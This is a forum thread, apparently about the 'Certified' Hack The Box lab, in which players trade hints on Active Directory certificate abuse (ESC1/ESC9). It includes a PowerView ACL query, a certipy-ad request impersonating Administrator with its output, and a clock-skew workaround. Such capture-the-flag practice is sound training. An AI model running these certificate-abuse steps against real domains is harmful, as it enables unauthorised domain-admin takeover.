Official Certified Discussion

I am at the same spot now as well. Just got user flag late last night.

The user CA_… has the permission to exploit ESC9, but there is no one he has generic write over. Running
Get-DomainObjectAcl -LDAPFilter "(&(objectClass=user)(objectCategory=person))" -ResolveGUIDs | ? {($_.ActiveDirectoryRights -contains "GenericAll" -or $_.ActiveDirectoryRights -contains "GenericWrite") -and $_.SecurityIdentifier -eq $CA_Operator.objectsid}
comes out empty. Can someone help?

certipy-ad req -u 'CA_operator@certified.htb' -p 'Mynewpassword2' -dc-ip 10.10.11.41 -ca certified-DC01-CA -template CertifiedAuthentication -upn Administrator@certified.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 22
[*] Got certificate with UPN 'ca_operator@certified.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'ca_operator.pfx'
I'm not getting the Administrator pfx. Someone help, I'm lost. This template fits all the criteria for ESC1.

As I cannot post links on the forum unfortunately… maybe try to google: certipy pentest tutorial.
Hope that helps.

Good luck!

I ended up figuring it out: you can use another user to give that user the privilege of admin.

faketime 'now + 7 hours'
Worked really well, would recommend 10/10.

Pwned! Just follow the attack path.

This box is so much fun and good AD practice. However, I kept having this error "KRB_AP_ERR_SKEW(Clock skew too great)", which was super annoying. Despite using ntpdate to fix it, the time kept changing for some reason.

For anyone facing the same issue, look at the code again. Understand it and you will feel dumb like me…

Thank you very much, I was trying all the above solutions without success but this finally worked. Thanks!!

I have the same issue. Were you able to fix it?